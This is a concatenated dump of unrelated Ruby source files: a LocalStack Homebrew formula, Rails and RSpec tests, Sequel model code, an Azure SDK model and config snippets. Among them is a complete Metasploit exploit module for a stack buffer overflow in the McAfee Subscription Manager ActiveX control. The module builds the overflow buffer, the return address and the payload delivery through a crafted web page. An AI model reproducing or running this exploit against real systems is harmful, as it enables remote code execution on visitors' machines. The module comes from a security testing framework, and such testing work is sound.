f81e53bbee860429b9d913c2a3ce35438e07c197 | 10,452 | class Localstack < Formula
include Language::Python::Virtualenv
desc "Fully functional local AWS cloud stack"
homepage "https://github.com/localstack/localstack"
url "https://files.pythonhosted.org/packages/32/4b/104718327cbfa9362d52c96af98ab32d59ce9be7d1bca42ee913d5ba7cb2/localstack-0.13.3.6.tar.gz"
sha256 "b52c29ae28a3138ad5ee626a30e7980424dbfa61247561af322e820dbd4c7477"
license "Apache-2.0"
bottle do
sha256 cellar: :any_skip_relocation, arm64_monterey: "ad4172dc190db0b7793a466b7330dc16d7025690178519862f6a4d459a5758e1"
sha256 cellar: :any_skip_relocation, arm64_big_sur: "49268f21ce10a3227b07d8ac460ece38c65de4734ee11b41edc51db85f418446"
sha256 cellar: :any_skip_relocation, monterey: "e7b38f3b30dba4d5f10adb96a21e8f2c5ab9278199a4c8708c27d5103b8c7b50"
sha256 cellar: :any_skip_relocation, big_sur: "047f7fc4dc8d9e2c089b7dfbd969120280d3de748f5ba52c941029515c65a421"
sha256 cellar: :any_skip_relocation, catalina: "c48c435c68573814de60b4d1db5144c2d11f4dc64e484db8cc1273d44cf86e21"
sha256 cellar: :any_skip_relocation, x86_64_linux: "c7beb1b367c6f916f0814b0c4578a29e6879e3d511308950926a8cdd12c3c9f8"
end
depends_on "docker" => :test
depends_on "python-tabulate"
depends_on "[email protected]"
depends_on "six"
on_linux do
depends_on "rust" => :build
end
resource "boto3" do
url "https://files.pythonhosted.org/packages/f6/b0/e42a79e8dc51ff9d9817c12d911893049cfddefbe3e2c062401306102fb9/boto3-1.20.46.tar.gz"
sha256 "d7effba509d7298ef49316ba2da7a2ea115f2a7ff691f875f6354666663cf386"
end
resource "botocore" do
url "https://files.pythonhosted.org/packages/97/b9/f55bf7f44377c1093f16f789979b39d9bed51ad1f2069d17d1ca55d2d4c2/botocore-1.23.46.tar.gz"
sha256 "38dd4564839f531725b667db360ba7df2125ceb3752b0ba12759c3e918015b95"
end
resource "cachetools" do
url "https://files.pythonhosted.org/packages/ae/37/7fd45996b19200e0cb2027a0b6bef4636951c4ea111bfad36c71287247f6/cachetools-3.1.1.tar.gz"
sha256 "8ea2d3ce97850f31e4a08b0e2b5e6c34997d7216a9d2c98e0f3978630d4da69a"
end
resource "certifi" do
url "https://files.pythonhosted.org/packages/6c/ae/d26450834f0acc9e3d1f74508da6df1551ceab6c2ce0766a593362d6d57f/certifi-2021.10.8.tar.gz"
sha256 "78884e7c1d4b00ce3cea67b44566851c4343c120abd683433ce934a68ea58872"
end
resource "chardet" do
url "https://files.pythonhosted.org/packages/ee/2d/9cdc2b527e127b4c9db64b86647d567985940ac3698eeabc7ffaccb4ea61/chardet-4.0.0.tar.gz"
sha256 "0d6f53a15db4120f2b08c94f11e7d93d2c911ee118b6b30a04ec3ee8310179fa"
end
resource "click" do
url "https://files.pythonhosted.org/packages/f4/09/ad003f1e3428017d1c3da4ccc9547591703ffea548626f47ec74509c5824/click-8.0.3.tar.gz"
sha256 "410e932b050f5eed773c4cda94de75971c89cdb3155a72a0831139a79e5ecb5b"
end
resource "colorama" do
url "https://files.pythonhosted.org/packages/1f/bb/5d3246097ab77fa083a61bd8d3d527b7ae063c7d8e8671b1cf8c4ec10cbe/colorama-0.4.4.tar.gz"
sha256 "5941b2b48a20143d2267e95b1c2a7603ce057ee39fd88e7329b0c292aa16869b"
end
resource "commonmark" do
url "https://files.pythonhosted.org/packages/60/48/a60f593447e8f0894ebb7f6e6c1f25dafc5e89c5879fdc9360ae93ff83f0/commonmark-0.9.1.tar.gz"
sha256 "452f9dc859be7f06631ddcb328b6919c67984aca654e5fefb3914d54691aed60"
end
resource "deepdiff" do
url "https://files.pythonhosted.org/packages/44/46/94a28a8a12889f61ab5a63f68665123d1b671b6eaf861d3ad3ed65614bf1/deepdiff-5.7.0.tar.gz"
sha256 "838766484e323dcd9dec6955926a893a83767dc3f3f94542773e6aa096efe5d4"
end
resource "dill" do
url "https://files.pythonhosted.org/packages/e2/96/518a8ea959a734b70d2e95fef98bcbfdc7adad1c1e5f5dd9148c835205a5/dill-0.3.2.zip"
sha256 "6e12da0d8e49c220e8d6e97ee8882002e624f1160289ce85ec2cc0a5246b3a2e"
end
resource "dnslib" do
url "https://files.pythonhosted.org/packages/e1/96/5889c7fc3b55e727deae20d6a3157423f1355d3dac010c1f1c53dca017bd/dnslib-0.9.19.tar.gz"
sha256 "a6e36ca96c289e2cb4ac6aa05c037cbef318401ba8ff04a8676892ca79749c77"
end
resource "dnspython" do
url "https://files.pythonhosted.org/packages/84/f4/84eca79c279640671b8b7086ef1b97268c2b7ba17f7cfe0a19b466a6f95c/dnspython-2.2.0.tar.gz"
sha256 "e79351e032d0b606b98d38a4b0e6e2275b31a5b85c873e587cc11b73aca026d6"
end
resource "docker" do
url "https://files.pythonhosted.org/packages/fa/a2/e46d7c1b51394a09271a3b07c3a68deb3a669429beafd444d9553ed52868/docker-5.0.0.tar.gz"
sha256 "3e8bc47534e0ca9331d72c32f2881bb13b93ded0bcdeab3c833fb7cf61c0a9a5"
end
resource "dulwich" do
url "https://files.pythonhosted.org/packages/77/42/8a7669dbea5086ed2ee759d75414764a8256070d3c9adcf0e2067ebd9891/dulwich-0.20.32.tar.gz"
sha256 "dc5498b072bdc12c1effef4b6202cd2a4542bb1c6dbb4ddcfc8c6d53e08b488c"
end
resource "idna" do
url "https://files.pythonhosted.org/packages/ea/b7/e0e3c1c467636186c39925827be42f16fee389dc404ac29e930e9136be70/idna-2.10.tar.gz"
sha256 "b307872f855b18632ce0c21c5e45be78c0ea7ae4c15c828c20788b26921eb3f6"
end
resource "jmespath" do
url "https://files.pythonhosted.org/packages/3c/56/3f325b1eef9791759784aa5046a8f6a1aff8f7c898a2e34506771d3b99d8/jmespath-0.10.0.tar.gz"
sha256 "b85d0567b8666149a93172712e68920734333c0ce7e89b78b3e987f71e5ed4f9"
end
resource "localstack-client" do
url "https://files.pythonhosted.org/packages/4f/b4/92dbff5938fd135909bb1cf0b4c27c5a1b3221784dc6087c1773942fcbcd/localstack-client-1.31.tar.gz"
sha256 "7030dae0d778feef0a790800ba3d50af81d49e410e97df7ddd6ff442e05825a7"
end
resource "localstack-ext" do
url "https://files.pythonhosted.org/packages/e9/00/004decb15e3ded28a4f6c1894d9a576380b43699a04e2100a8ec843817e0/localstack-ext-0.13.3.12.tar.gz"
sha256 "ebf6bcab299a858768acd1698a63b618fb7bf99242f9261389f9cc888a64058c"
end
resource "localstack-plugin-loader" do
url "https://files.pythonhosted.org/packages/2e/82/7e78c8056df07bf05196ee40b4244399f7a66ee5c1fe7ac1c837bf30755b/localstack-plugin-loader-1.1.1.tar.gz"
sha256 "eb829c47332caf2ff1062a2038077e0a5e93c30bb2c61cf2651b07ccadd77448"
end
resource "ordered-set" do
url "https://files.pythonhosted.org/packages/f5/ab/8252360bfe965bba31ec05112b3067bd129ce4800d89e0b85613bc6044f6/ordered-set-4.0.2.tar.gz"
sha256 "ba93b2df055bca202116ec44b9bead3df33ea63a7d5827ff8e16738b97f33a95"
end
resource "pbr" do
url "https://files.pythonhosted.org/packages/f5/0c/3fa7b1f9006e4d454a49b48eac995167cf8617e19375c6963a6b048af0d0/pbr-5.8.0.tar.gz"
sha256 "672d8ebee84921862110f23fcec2acea191ef58543d34dfe9ef3d9f13c31cddf"
end
resource "psutil" do
url "https://files.pythonhosted.org/packages/47/b6/ea8a7728f096a597f0032564e8013b705aa992a0990becd773dcc4d7b4a7/psutil-5.9.0.tar.gz"
sha256 "869842dbd66bb80c3217158e629d6fceaecc3a3166d3d1faee515b05dd26ca25"
end
resource "pyaes" do
url "https://files.pythonhosted.org/packages/44/66/2c17bae31c906613795711fc78045c285048168919ace2220daa372c7d72/pyaes-1.6.1.tar.gz"
sha256 "02c1b1405c38d3c370b085fb952dd8bea3fadcee6411ad99f312cc129c536d8f"
end
resource "Pygments" do
url "https://files.pythonhosted.org/packages/94/9c/cb656d06950268155f46d4f6ce25d7ffc51a0da47eadf1b164bbf23b718b/Pygments-2.11.2.tar.gz"
sha256 "4e426f72023d88d03b2fa258de560726ce890ff3b630f88c21cbb8b2503b8c6a"
end
resource "python-dateutil" do
url "https://files.pythonhosted.org/packages/4c/c4/13b4776ea2d76c115c1d1b84579f3764ee6d57204f6be27119f13a61d0a9/python-dateutil-2.8.2.tar.gz"
sha256 "0123cacc1627ae19ddf3c27a5de5bd67ee4586fbdd6440d9748f8abb483d3e86"
end
resource "python-dotenv" do
url "https://files.pythonhosted.org/packages/49/62/4f25667e10561303a34cb89e3187c35985c0889b99f6f1468aaf17fbb03e/python-dotenv-0.19.2.tar.gz"
sha256 "a5de49a31e953b45ff2d2fd434bbc2670e8db5273606c1e737cc6b93eff3655f"
end
resource "PyYAML" do
url "https://files.pythonhosted.org/packages/36/2b/61d51a2c4f25ef062ae3f74576b01638bebad5e045f747ff12643df63844/PyYAML-6.0.tar.gz"
sha256 "68fb519c14306fec9720a2a5b45bc9f0c8d1b9c72adf45c37baedfcd949c35a2"
end
resource "requests" do
url "https://files.pythonhosted.org/packages/6b/47/c14abc08432ab22dc18b9892252efaf005ab44066de871e72a38d6af464b/requests-2.25.1.tar.gz"
sha256 "27973dd4a904a4f13b263a19c866c13b92a39ed1c964655f025f3f8d3d75b804"
end
resource "rich" do
url "https://files.pythonhosted.org/packages/81/d2/64751634e1af18e61454e9946c8c792ab3866c2b309615844fc435036715/rich-11.1.0.tar.gz"
sha256 "43e03d8eec12e21beaecc22c828a41c4247356414a12d5879834863d4ad53816"
end
resource "s3transfer" do
url "https://files.pythonhosted.org/packages/88/ef/4d1b3f52ae20a7e72151fde5c9f254cd83f8a49047351f34006e517e1655/s3transfer-0.5.0.tar.gz"
sha256 "50ed823e1dc5868ad40c8dc92072f757aa0e653a192845c94a3b676f4a62da4c"
end
resource "semver" do
url "https://files.pythonhosted.org/packages/31/a9/b61190916030ee9af83de342e101f192bbb436c59be20a4cb0cdb7256ece/semver-2.13.0.tar.gz"
sha256 "fa0fe2722ee1c3f57eac478820c3a5ae2f624af8264cbdf9000c980ff7f75e3f"
end
resource "stevedore" do
url "https://files.pythonhosted.org/packages/67/73/cd693fde78c3b2397d49ad2c6cdb082eb0b6a606188876d61f53bae16293/stevedore-3.5.0.tar.gz"
sha256 "f40253887d8712eaa2bb0ea3830374416736dc8ec0e22f5a65092c1174c44335"
end
resource "tailer" do
url "https://files.pythonhosted.org/packages/dd/05/01de24d6393d6da0c27857c76b0f9ae97b42cd6102bbdf76cce95e031295/tailer-0.4.1.tar.gz"
sha256 "78d60f23a1b8a2d32f400b3c8c06b01142ac7841b75d8a1efcb33515877ba531"
end
resource "urllib3" do
url "https://files.pythonhosted.org/packages/b0/b1/7bbf5181f8e3258efae31702f5eab87d8a74a72a0aa78bc8c08c1466e243/urllib3-1.26.8.tar.gz"
sha256 "0e7c33d9a63e7ddfcb86780aac87befc2fbddf46c58dbb487e0855f7ceec283c"
end
resource "websocket-client" do
url "https://files.pythonhosted.org/packages/b6/fa/72e77d094563208174abbbaa73c32f28c43a31193b843bddf233c7c87644/websocket-client-1.2.3.tar.gz"
sha256 "1315816c0acc508997eb3ae03b9d3ff619c9d12d544c9a9b553704b1cc4f6af5"
end
def install
virtualenv_install_with_resources
end
test do
ENV["DOCKER_HOST"] = "unix://" + (testpath/"invalid.sock")
assert_match version.to_s, shell_output("#{bin}/localstack --version")
output = shell_output("#{bin}/localstack start --docker", 1)
assert_match "starting LocalStack in Docker mode", output
end
end
| 48.165899 | 154 | 0.824244 |
b9c4f9199e5a71f33c4f86f3cb22cf12e6c62905 | 2,553 | # frozen_string_literal: true
require 'test_helper'
# Test that notifications can be viewed and marked as read.
class NotificationsControllerTest < ActionController::TestCase
setup do
@regular_user = users(:valid)
end
test 'should get index' do
login(@regular_user)
get :index
assert_response :success
assert_not_nil assigns(:notifications)
end
test 'should get all read index' do
login(@regular_user)
get :index, params: { all: '1' }
assert_response :success
assert_not_nil assigns(:notifications)
end
test 'should show comment notification' do
login(@regular_user)
get :show, params: { id: notifications(:comment) }
assert_not_nil assigns(:notification)
assert_equal true, assigns(:notification).read
assert_redirected_to notifications(:comment).comment.sticky
end
test 'should show task completed notification' do
login(@regular_user)
get :show, params: { id: notifications(:task) }
assert_not_nil assigns(:notification)
assert_equal true, assigns(:notification).read
assert_redirected_to notifications(:task).sticky
end
test 'should show blank notification and redirect' do
login(@regular_user)
get :show, params: { id: notifications(:blank) }
assert_not_nil assigns(:notification)
assert_equal true, assigns(:notification).read
assert_redirected_to notifications_path
end
test 'should not show notification without valid id' do
login(@regular_user)
get :show, params: { id: -1 }
assert_nil assigns(:notification)
assert_redirected_to notifications_path
end
test 'should update notification' do
login(users(:valid))
patch :update, params: {
id: notifications(:comment), notification: { read: true }
}, format: 'js'
assert_not_nil assigns(:notification)
assert_equal true, assigns(:notification).read
assert_template 'show'
assert_response :success
end
test 'should mark all as read' do
login(@regular_user)
patch :mark_all_as_read, params: {
project_id: projects(:one)
}, format: 'js'
assert_equal 0, users(:valid).notifications.where(project_id: projects(:one), read: false).count
assert_template 'mark_all_as_read'
assert_response :success
end
test 'should not mark all as read without project' do
login(@regular_user)
assert_difference('Notification.where(read: false).count', 0) do
patch :mark_all_as_read, format: 'js'
end
assert_template 'mark_all_as_read'
assert_response :success
end
end
| 29.686047 | 100 | 0.720721 |
080fab9eb53be95c4a3c60d8665c1578c1ab8386 | 908 | require 'compass/import-once/activate'
# Require any additional compass plugins here.
# Set this to the root of your project when deployed:
http_path = "/"
css_dir = "./style/css"
sass_dir = "./style/sass"
images_dir = "images"
javascripts_dir = "javascripts"
# You can select your preferred output style here (can be overridden via the command line):
# output_style = :expanded or :nested or :compact or :compressed
# To enable relative paths to assets via compass helper functions. Uncomment:
# relative_assets = true
# To disable debugging comments that display the original location of your selectors. Uncomment:
# line_comments = false
# If you prefer the indented syntax, you might want to regenerate this
# project again passing --syntax sass, or you can uncomment this:
# preferred_syntax = :sass
# and then run:
# sass-convert -R --from scss --to sass sass scss && rm -rf sass && mv scss sass
| 34.923077 | 96 | 0.752203 |
3912f3fca6109324cfcc7586ced4dc757fbd0953 | 722 | # frozen_string_literal: true
class RunClaimReviewParser
include Sidekiq::Worker
def perform(service, cursor_back_to_date = nil, overwrite_existing_claims=false, send_notifications=true)
cursor_back_to_date = Time.parse(cursor_back_to_date) unless cursor_back_to_date.nil?
ClaimReviewParser.record_service_heartbeat(service)
ClaimReviewParser.run(service, cursor_back_to_date, overwrite_existing_claims, send_notifications)
RunClaimReviewParser.perform_in(Settings.task_interevent_time, service)
end
def self.requeue(service)
if $REDIS_CLIENT.get(ClaimReview.service_heartbeat_key(service)).nil?
RunClaimReviewParser.perform_async(service)
return true
end
false
end
end
| 36.1 | 107 | 0.810249 |
018bb98a8166d0e9a1cf0edc156bea85b1707a09 | 4,325 | # frozen_string_literal: true
require "spec_helper"
require "fakeweb"
require "openssl"
require "jwt"
CERTS_URI = "https://www.googleapis.com/robot/v1/metadata/x509/[email protected]"
RSpec.describe FirebaseIDToken::Validator do
describe "#check" do
before(:all) do
crypto = generate_certificate
@key = crypto[:key]
@cert = crypto[:cert]
end
let(:project_id) { "my-firebase-project-id" }
let(:aud) { project_id }
let(:iss) { "https://securetoken.google.com/#{project_id}" }
let(:exp) { Time.now + 10 }
let(:payload) { {
exp: exp.to_i,
iss: iss,
aud: aud,
user_id: "12345",
email: "[email protected]",
provider_id: "google.com",
verified: true
}}
let(:token) { JWT.encode(payload, @key, "RS256") }
context "with old_skool certs" do
let(:validator) { FirebaseIDToken::Validator.new aud: project_id }
context "when unable to fetch Google certs" do
before do
FakeWeb::register_uri :get, CERTS_URI,
status: ["404", "Not found"], body: "Ouch!"
end
it "raises an error" do
expect {
validator.check("whatever")
}.to raise_error(FirebaseIDToken::CertificateError)
end
end
context "when able to fetch old_skool certs" do
before(:all) do
crypto = generate_certificate
@key2 = crypto[:key]
@cert2 = crypto[:cert]
@certs_body = JSON.dump({
"123" => @cert.to_pem,
"321" => @cert2.to_pem
})
end
before do
FakeWeb::register_uri :get, CERTS_URI,
status: ["200", "Success"], body: @certs_body
end
it "successfully validates a good token" do
result = validator.check(token)
expect(result).to_not be_nil
expect(result["aud"]).to eq aud
end
it "fails to validate a mangled token" do
bad_token = token.gsub("x", "y")
expect {
validator.check(bad_token)
}.to raise_error(FirebaseIDToken::SignatureError)
end
it "fails to validate a good token with wrong aud field" do
validator = FirebaseIDToken::Validator.new(aud: "other-project-id")
expect {
validator.check(token)
}.to raise_error(FirebaseIDToken::AudienceMismatchError)
end
context "when token is expired" do
let(:exp) { Time.now - 10 }
it "fails to validate a good token" do
expect {
validator.check(token)
}.to raise_error(FirebaseIDToken::ExpiredTokenError)
end
end
context "with an invalid issuer" do
let(:iss) { "https://accounts.fake.com" }
it "fails to validate a good token" do
expect {
validator.check(token)
}.to raise_error(FirebaseIDToken::InvalidIssuerError)
end
end
context "when certificates are not expired" do
before { validator.instance_variable_set(:@certs_last_refresh, Time.now) }
it "fails to validate a good token" do
expect {
validator.check(token)
}.to raise_error(FirebaseIDToken::SignatureError)
end
end
context "when certificates are expired" do
let(:validator) { FirebaseIDToken::Validator.new(aud: project_id, expiry: 60) }
before { validator.instance_variable_set(:@certs_last_refresh, Time.now - 120) }
it "fails to validate a good token" do
result = validator.check(token)
expect(result).to_not be_nil
expect(result["aud"]).to eq aud
end
end
end
end
end
def generate_certificate
key = OpenSSL::PKey::RSA.new(2048)
public_key = key.public_key
cert_subject = "/C=BE/O=Test/OU=Test/CN=Test"
cert = OpenSSL::X509::Certificate.new
cert.subject = cert.issuer = OpenSSL::X509::Name.parse(cert_subject)
cert.not_before = Time.now
cert.not_after = Time.now + 365 * 24 * 60 * 60
cert.public_key = public_key
cert.serial = 0x0
cert.version = 2
cert.sign key, OpenSSL::Digest::SHA1.new
{ key: key, cert: cert }
end
end
| 28.833333 | 102 | 0.587746 |
3869cdcc4823ba67ed9e36f7f511c9f224cc18b6 | 2,870 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2020_03_01
module Models
#
# Result of the request to list VirtualWANs. It contains a list of
# VirtualWANs and a URL nextLink to get the next set of results.
#
class ListVirtualWANsResult
include MsRestAzure
include MsRest::JSONable
# @return [Array<VirtualWAN>] List of VirtualWANs.
attr_accessor :value
# @return [String] URL to get the next set of operation list results if
# there are any.
attr_accessor :next_link
# return [Proc] with next page method call.
attr_accessor :next_method
#
# Gets the rest of the items for the request, enabling auto-pagination.
#
# @return [Array<VirtualWAN>] operation results.
#
def get_all_items
items = @value
page = self
while page.next_link != nil && !page.next_link.strip.empty? do
page = page.get_next_page
items.concat(page.value)
end
items
end
#
# Gets the next page of results.
#
# @return [ListVirtualWANsResult] with next page content.
#
def get_next_page
response = @next_method.call(@next_link).value! unless @next_method.nil?
unless response.nil?
@next_link = response.body.next_link
@value = response.body.value
self
end
end
#
# Mapper for ListVirtualWANsResult class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'ListVirtualWANsResult',
type: {
name: 'Composite',
class_name: 'ListVirtualWANsResult',
model_properties: {
value: {
client_side_validation: true,
required: false,
serialized_name: 'value',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'VirtualWANElementType',
type: {
name: 'Composite',
class_name: 'VirtualWAN'
}
}
}
},
next_link: {
client_side_validation: true,
required: false,
serialized_name: 'nextLink',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 28.415842 | 80 | 0.529965 |
03a0a0d345917c5cbee384821ab384aeb30dce83 | 46 | datadog_monitor 'potato' do
action :add
end
| 11.5 | 27 | 0.76087 |
26bc6c265ebf834cfcff6c5f838013eafea9606e | 275 | module Innsights
# Ties up the gem into the Rails boot process
# Explicitly calls the rake tasks located in lib/tasks
class Railtie < Rails::Railtie
rake_tasks do
Dir[File.join(File.dirname(__FILE__),'../tasks/*.rake')].each { |f| load f }
end
end
end | 30.555556 | 82 | 0.683636 |
f7b28c1be2c78cf49c7bbf3a3d24e4260800d09b | 3,174 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'McAfee Subscription Manager Stack Buffer Overflow',
'Description' => %q{
This module exploits a flaw in the McAfee Subscription Manager ActiveX control.
Due to an unsafe use of vsprintf, it is possible to trigger a stack buffer overflow by
passing a large string to one of the COM-exposed routines, such as IsAppExpired.
This vulnerability was discovered by Karl Lynn of eEye.
},
'License' => MSF_LICENSE,
'Author' =>
[
'skape',
],
'References' =>
[
[ 'CVE', '2006-3961'],
[ 'OSVDB', '27698'],
[ 'BID', '19265'],
[ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048565.html'],
],
'Payload' =>
{
'Space' => 1014,
'MaxNops' => 0,
'BadChars' => "\x00\x09\x0a\x0d'\\" + Rex::Text::UpperAlpha + Rex::Text::HighAscii,
'EncoderType' => Msf::Encoder::Type::NonUpperUtf8Safe,
'EncoderOptions' =>
{
'BufferOffset' => 0x8
}
},
'Targets' =>
[
# Target 0: Automatic
[
'Windows XP SP0/SP1',
{
'Platform' => 'win',
'Rets' =>
[
0x7605122f, # XP SP0/SP1 shell32.dll: jmp esp
#0x773f346a # XP SP2 comctl32.dll: jmp esp
]
},
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 01 2006'))
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Pick the right target
case request['User-Agent']
when /Windows NT 5.1/
ret = target['Rets'][0]
else
print_error("Unsupported target: #{request['User-Agent']}")
cli.send_response(create_response(404, 'File not found'))
return
end
# Build out our overflow buffer
buf =
rand_text(2972, payload_badchars) +
[ ret ].pack('V') +
"\x60" + # pusha
"\x6a" + rand_char + # push byte 0x1
"\x6a" + rand_char + # push byte 0x1
"\x6a" + rand_char + # push byte 0x1
"\x61" + # popa
p.encoded
# Generate random variable names
vname = rand_text_alpha(rand(100) + 1)
strname = rand_text_alpha(rand(100) + 1)
# Build out the message
content =
"<html>" +
"<object classid='clsid:9BE8D7B2-329C-442A-A4AC-ABA9D7572602' id='#{vname}'></object>" +
"<script language='javascript'>\n" +
"var #{vname} = document.getElementById('#{vname}');\n" +
"var #{strname} = new String('#{buf}');\n" +
"#{vname}.IsAppExpired(#{strname}, #{strname}, #{strname});\n" +
"</script>" +
"</html>"
print_status("Sending #{self.name}")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end
| 27.128205 | 94 | 0.597984 |
1cafee194aa299608396c87b1758031d5c9d2c35 | 2,067 | class Order < ApplicationRecord
belongs_to :organization
belongs_to :organization_unscoped, -> { unscope(:where) }, class_name: "Organization", foreign_key: :organization_id
belongs_to :user
has_many :order_details, autosave: true
has_many :items, through: :order_details
has_many :shipments
include OrderStatus
def self.by_status_includes_extras(statuses, include_tables = [:organization, :order_details, :shipments])
statuses = [statuses].flatten.map { |s| Order.statuses[s] }
includes(*include_tables).where(status: statuses)
end
def unscoped_organization
@unscoped_organization ||= Organization.unscoped { organization }
end
def add_shipments(params)
params[:order][:shipments][:tracking_number].each_with_index do |tracking_number, index|
shipping_carrier = params[:order][:shipments][:shipping_carrier][index]
shipments.build date: Time.zone.now, tracking_number: tracking_number, shipping_carrier: shipping_carrier.to_i
end
end
def formatted_order_date
order_date.strftime("%-m/%-d/%Y") if order_date.present?
end
def submitted?
!select_items? && !select_ship_to? && !confirm_order?
end
def open?
!(closed? || rejected? || canceled?)
end
def order_uneditable?
filled? || shipped? || received? || closed? || rejected? || canceled?
end
def ship_to_addresses
organization.addresses.map(&:address)
end
def ship_to_names
[user.name.to_s, "#{organization.name} c/o #{user.name}"]
end
def organization_ship_to_names
organization.users.map do |user|
[user.name.to_s, "#{organization.name} c/o #{user.name}"]
end.flatten
end
def to_json
{
id: id,
status: status,
order_details: order_details.sort_by(&:id).map(&:to_json),
in_requested_status: in_requested_status?
}.to_json
end
def self.to_json
includes(:order_details).order(:id).all.map(&:to_json).to_json
end
def value
order_details.map(&:total_value).sum
end
def item_count
order_details.map(&:quantity).sum
end
end
| 26.5 | 118 | 0.708757 |
bbd88e4293514cec6bfd81107b7256825282991d | 1,313 | STDLIB_FILES = %w[
English.rb
abbrev.rb
base64.rb
benchmark.rb
cgi
cgi.rb
cmath.rb
csv.rb
date
date.rb
debug.rb
delegate.rb
drb
drb.rb
e2mmap.rb
erb.rb
fileutils.rb
find.rb
forwardable.rb
getoptlong.rb
ipaddr.rb
irb
irb.rb
logger.rb
mathn.rb
matrix
matrix.rb
monitor.rb
mutex_m.rb
net
observer.rb
open-uri.rb
open3.rb
optionparser.rb
optparse
optparse.rb
ostruct.rb
pp.rb
prettyprint.rb
prime.rb
profile.rb
profiler.rb
pstore.rb
racc
rbconfig
resolv-replace.rb
resolv.rb
rexml
rinda
rss
rss.rb
scanf.rb
set.rb
shell
shell.rb
shellwords.rb
singleton.rb
sync.rb
thwait.rb
time.rb
tracer.rb
tsort.rb
un.rb
unicode_normalize
unicode_normalize.rb
uri
uri.rb
webrick
webrick.rb
xmlrpc
xmlrpc.rb
yaml
yaml.rb
]
EXT_FILES = {
'ext/bigdecimal/lib/bigdecimal' => 'bigdecimal',
'ext/digest/lib/digest.rb' => 'digest.rb',
'ext/digest/sha2/lib/sha2.rb' => 'digest/sha2.rb',
'ext/nkf/lib/kconv.rb' => 'kconv.rb',
'ext/pathname/lib/pathname.rb' => 'pathname.rb',
'ext/pty/lib/expect.rb' => 'expect.rb',
'ext/socket/lib/socket.rb' => 'socket.rb',
'ext/win32/lib/win32' => 'win32',
'ext/fiddle/lib/fiddle.rb' => 'fiddle.rb',
'ext/fiddle/lib/fiddle' => 'fiddle'
}
| 14.752809 | 52 | 0.651942 |
e23a9dffa758f2a3f9272a7cdfe4f277d1ab2561 | 4,830 | module Sequel
class Model
ID_POSTFIX = '_id'.freeze
# Creates a 1-1 relationship by defining an association method, e.g.:
#
# class Session < Sequel::Model
# end
#
# class Node < Sequel::Model
# one_to_one :producer, :from => Session
# # which is equivalent to
# def producer
# Session[producer_id] if producer_id
# end
# end
#
# You can also set the foreign key explicitly by including a :key option:
#
# one_to_one :producer, :from => Session, :key => :producer_id
#
# The one_to_one macro also creates a setter, which accepts nil, a hash or
# a model instance, e.g.:
#
# p = Producer[1234]
# node = Node[:path => '/']
# node.producer = p
# node.producer_id #=> 1234
#
def self.one_to_one(name, opts)
from = opts[:from]
from || (raise Error, "No association source defined (use :from option)")
key = opts[:key] || (name.to_s + ID_POSTFIX).to_sym
setter_name = "#{name}=".to_sym
case from
when Symbol
class_def(name) {(k = @values[key]) ? db[from][:id => k] : nil}
when Sequel::Dataset
class_def(name) {(k = @values[key]) ? from[:id => k] : nil}
else
class_def(name) {(k = @values[key]) ? from[k] : nil}
end
class_def(setter_name) do |v|
case v
when nil
set(key => nil)
when Sequel::Model
set(key => v.pk)
when Hash
set(key => v[:id])
end
end
# define_method name, &eval(ONE_TO_ONE_PROC % [key, from])
end
# Creates a 1-N relationship by defining an association method, e.g.:
#
# class Book < Sequel::Model
# end
#
# class Author < Sequel::Model
# one_to_many :books, :from => Book
# # which is equivalent to
# def books
# Book.filter(:author_id => id)
# end
# end
#
# You can also set the foreign key explicitly by including a :key option:
#
# one_to_many :books, :from => Book, :key => :author_id
#
def self.one_to_many(name, opts)
from = opts[:from]
from || (raise Error, "No association source defined (use :from option)")
key = opts[:key] || (self.to_s + ID_POSTFIX).to_sym
case from
when Symbol
class_def(name) {db[from].filter(key => pk)}
else
class_def(name) {from.filter(key => pk)}
end
end
# TODO: Add/Replace current relations with the following specifications:
# ======================================================================
# Database modelling is generally done with an ER (Entity Relationship) diagram.
# Shouldn't ORM's facilitate simlilar specification?
# class Post < Sequel::Model
# relationships do
# # Specify the relationships that exist with the User model (users table)
# # These relationships are precisely the ER diagram connecting arrows.
# end
# end
#
# = Relationships
#
# are specifications of the ends of the ER diagrams connectors that are touching
# the current model.
#
# one_to_one, has_one
# many_to_one, belongs_to
# many_to_many, has_many
# ?parameters may be :zero, :one, :many which specifies the cardinality of the connection
# Example:
# class Post < Sequel::Model
# relationships do
# has :one, :blog, :required => true # blog_id field, cannot be null
# has :one, :account # account_id field
# has :many, :comments # comments_posts join table
# has :many, :authors, :required => true # authors_posts join table, requires at least one author
# end
# end
#
# Relationship API Details
#
#
# == belongs_to
#
# Defines an blog and blog= method
# belongs_to :blog
# Same, but uses "b_id" as the blog's id field.
# belongs_to :blog, :key => :b_id
# has_many :comments
# * Defines comments method which will query the join table appropriately.
# * Checks to see if a "comments_posts" join table exists (alphabetical order)
# ** If it does not exist, will create the join table.
# ** If options are passed in these will be used to further define the join table.
# Benefits:
# * Normalized DB
# * Easy to define join objects
# * Efficient queries, database gets to use indexed fields (pkeys) instead of a string field and an id.
#
# For example, polymorphic associations now become:
# [user] 1-* [addresses_users] *-1 [addresses]
# [companies] 1-* [addresses_companies] *-1 [addresses]
# [clients] 1-* [addresses_clients] *-1 [addresses]
end
end | 31.363636 | 108 | 0.57619 |
e85004d8e348f4eb29e5310e4a4deb2cfa1bd39d | 5,111 | require "active_support/core_ext/integer/time"
Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
